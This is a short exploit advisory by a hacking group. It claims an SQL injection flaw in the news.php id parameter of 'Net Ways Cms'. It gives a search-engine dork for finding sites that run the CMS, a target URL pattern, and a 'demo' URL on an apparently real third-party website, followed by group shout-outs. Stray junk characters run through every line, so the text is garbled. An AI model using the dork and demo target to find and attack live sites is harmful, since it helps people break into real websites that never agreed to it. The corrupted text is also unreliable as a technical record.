################################################################################??########
1 Y6 B" L' l" L' K* p G' g# 9 b5 b# k8 o: I/ v) @/ H0 }6 o
# Exploit Title : Net Ways Cms Sql Injection Vulnerability ! m& G5 d8 P# v: [6 X! Q
# " f5 ?: r; h- t! W
# Author : IrIsT.Ir
M; n: G4 P7 f# G& B#
7 q, w4 a" e% ]# Discovered By : Am!r
: ~7 _' p- x) K) A# E" z* O/ e: h9 v' k
# Home : http://IrIsT.Ir/forum
+ u1 s: Z$ i- @* D9 B0 e, |# ; |+ r! K* ^( F Q0 g7 \- ?
# Software Link : http://www.netways.com/ www.political-security.com% `, Q7 V0 N% s/ ?2 O
# . N; Y* C" ]7 H# ~+ e: L3 Z) N" g9 s
# Security Risk : High 7 d6 H2 r1 ^5 ]4 F
#
2 v9 \. g- \- N: N; d7 I6 I# Version : All Version 9 d9 v% K0 c, W0 n2 f$ }
# - q3 }5 ?8 R+ c3 H/ k0 o9 {
# Tested on : GNU/Linux Ubuntu - Windows Server - win7 7 k2 e/ y# u" w: V+ P I8 S
# ; c% w, @$ F0 k: I5 ]
# Dork : intext:"Designed & developed by NetWays"
0 J/ G! f/ D9 v#
. K$ j* Y: Y! m& S: C) \* S################################################################################??########
$ D' ^3 v6 a! X5 Z! I: `# 9 o* m% ?3 ]7 B3 S& c' d2 m
# Expl0iTs :
2 z$ [4 z: l' i4 {- I+ J2 h, F. P# 1 F$ Q/ \ c0 C! d5 w
# http://target.com/news.php?id=[Sql]
9 N: U, V! _, `9 a* O8 u) w# ) n) B& U% N2 |" |8 O( t' P4 d0 E# l* q
#
+ C& n) M$ U# J- P# D3mo : ! X- t( n7 e& a" z* ]# g9 m
# / F2 ?& f# c, n7 D
# http://compagnieparento.com/news.php?id=7[Sql]
- f1 a/ s7 B- s3 R1 z+ L" t7 i#
7 h! c7 X. ?! |3 y################################################################################??########
2 p1 ~ {; v$ ?9 [#
9 P' e3 e$ \. V5 F1 i/ Q% Y# Greats : B3HZ4D - nimaarek - Dead.Zone - C0dex - SpooferNinja - TaK.FaNaR - Nafsh - BestC0d3r
6 I0 Z: {8 P* q! j1 e# * Q$ I% K7 {/ b
# 0x0ptim0us - TaK.FaNaR - m3hdi - F@rid - Siamak.Black - H4x0r - dr.tofan - skote_vahshat - d3c0d3r
/ f9 s6 a: S/ F/ |#
: x% s# T/ ?1 G2 Q# Mr.Xpr & M.R.S.CO & Mr.Cicili & H-SK33PY & All Members In Www.IrIsT.Ir/forum 1 k Z h/ P, f0 n' h; ?- r! E
#
5 |: f$ W8 E% A% ?################################################################################??######## |